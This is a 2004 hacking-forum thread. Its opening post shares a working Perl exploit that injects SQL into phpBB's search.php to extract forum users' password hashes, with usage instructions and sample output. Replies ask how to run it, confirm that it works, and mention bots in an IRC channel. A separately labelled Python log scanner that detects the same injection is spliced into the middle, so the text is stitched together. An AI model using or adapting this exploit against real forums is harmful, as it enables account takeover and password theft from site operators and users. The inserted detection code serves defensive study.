ComSec
Jan 10 2004, 02:45 PM
MySQL v4.0 and all PHPBB Versions under 2.0.6
This tweak has been provided by icenix (Trial member); any questions about it, please direct them to icenix.
Thanks bud for sharing.
| CODE |
#!/usr/bin/perl -w
use IO::Socket;
##
## * work only with mysql ver > 4.0
##
## Example:
## [root@anarchist]# ./phpbb.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] wo0t...MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4) {
    print "\n\n";
    print "|****************************************************************|\n";
    print " r57phpbb.pl\n";
    print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
    print " by RusH and Tweaked by IceNix\n";
    print " Enjoy =) ... \n";
    print " Usage: phpbb.pl <server> <folder> <user_id> <search_id>\n";
    print " e.g.: phpbb.pl 127.0.0.1 phpBB2 2 2\n";
    print " [~] <server> - server ip\n";
    print " [~] <folder> - forum folder\n";
    print " [~] <user_id> - user id (2 default for phpBB admin)\n";
    print " [~] <search_id> - play with this value for results\n";
    print "|****************************************************************|\n";
    print "\n\n";
    exit(1);
}
$success   = 0;
$server    = $ARGV[0];
$folder    = $ARGV[1];
$user_id   = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT request...
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>) {
    if ($answer =~ /;highlight=/) {
        $success = 1;
        @result  = split(/;/, $answer);
        @result2 = split(/=/, $result[1]);
        $result2[1] =~ s/&/ /g;
        print "[+] wo0t...MD5 Hash for user with id=$user_id is: $result2[1]\n";
    }
}
if ($success == 0) { print "[-] exploit failed =( prolly not MySQL 4\n"; }
|
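As an added defensive example (not part of this thread and not icenix's or RusH's code): a small Python scanner over constructed web-server log lines that flags search.php requests whose search_id parameter is not a plain integer, which is the request shape the script above sends. The log lines, IPs and paths are made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). Line 3 mimics the request
# shape of the PoC in this thread: search.php?search_id=<n> UNION SELECT ... FROM phpbb_users
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2004:14:45:01 +0000] "GET /phpBB2/search.php?search_id=17 HTTP/1.0" 200 5120
10.0.0.6 - - [10/Jan/2004:14:45:09 +0000] "GET /phpBB2/viewtopic.php?t=42 HTTP/1.0" 200 8800
10.0.0.7 - - [10/Jan/2004:14:46:30 +0000] "GET /phpBB2/search.php?search_id=2%20union%20select%20concat(char(97,58,55),user_password,char(34))%20from%20phpbb_users%20where%20user_id=2/* HTTP/1.0" 200 1200
10.0.0.8 - - [10/Jan/2004:14:47:02 +0000] "GET /phpBB2/search.php?search_id=abc HTTP/1.0" 200 900
"""

# Common/combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Tokens that have no business inside an integer id; /* and -- are comment terminators
SQL_MARKERS = re.compile(r"\b(union|select|concat|from|where)\b|/\*|--", re.IGNORECASE)


def classify_search_id(value: str) -> str:
    """Return 'ok' for a bare integer, 'sqli' if SQL tokens are present, else 'malformed'."""
    if value.isdigit():
        return "ok"
    if SQL_MARKERS.search(value):
        return "sqli"
    return "malformed"


def scan_log(text: str):
    """Flag every search.php request whose search_id is not a plain integer."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/search.php"):
            continue
        # parse_qs URL-decodes values, so %20 becomes a space before we inspect them
        for value in parse_qs(parts.query, keep_blank_values=True).get("search_id", []):
            verdict = classify_search_id(value)
            if verdict != "ok":
                findings.append({"ip": m.group("ip"), "verdict": verdict, "search_id": value[:80]})
    return findings
```

Feeding a real log in place of SAMPLE_LOG is a one-line change; the verdict keys are deliberately coarse so the output can be fed to an alerting rule.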
The Storm
Jan 14 2004, 12:52 PM
Is this exploit really working? And how well is it working? Has anyone tested it?
-=@cIdBuRn=-
Jan 14 2004, 02:10 PM
Which scanner are you using for it??? Banner scanner??
XtrA
Jan 14 2004, 02:21 PM
How can I run a perl exploit with WinXP?
Steffan
Jan 14 2004, 09:58 PM
| QUOTE (XtrA @ Jan 14 2004, 02:21 PM) | How can I run a perl exploit with WinXP? |
Install cygwin and the perl module and run it. C'ya
icenix
Jan 15 2004, 01:42 AM
Hey guys - I'm now a member. I guess most exploits run as smooth as syrup on Linux.. but you guys can use it for Windows if you install some sort of emulator like ActiveState Perl or something like that... It does work.. but you just got to make sure they're running MySQL 4.0. Tested on RedHat 9 against PHPBB 2.0.5, if I remember that right.. worked all okay... truly does work. enjoi, icenix
AsuKa
Jan 16 2004, 01:15 PM
Sounds interesting, could anyone provide a doc or tut on some uses for this tool, or at least start me in the right direction? Thanks in advance.
Yellow_Blue
Jan 17 2004, 06:47 AM
Sounds cool ;o nice exploit
TrIaNguLaR
Jan 18 2004, 03:33 PM
thanks
jead99
Jan 18 2004, 05:25 PM
Thanks for sharing
SyN/AcK
Jan 18 2004, 06:21 PM
Works for me, thanks.
derquakecommander
Jan 18 2004, 06:58 PM
Yes, I think it is a nice exploit, but every time I get
[-] exploit failed =( prolly not MySQL 4
I hope I find the right MySQL version.
DvilleStoner
Feb 26 2004, 10:54 AM
| QUOTE (icenix @ Jan 15 2004, 01:42 AM) | Hacking is like gay sex...you go through the backdoor and hope you don't run into a log |
haha, I have seen that in this irc channel I got bots in =p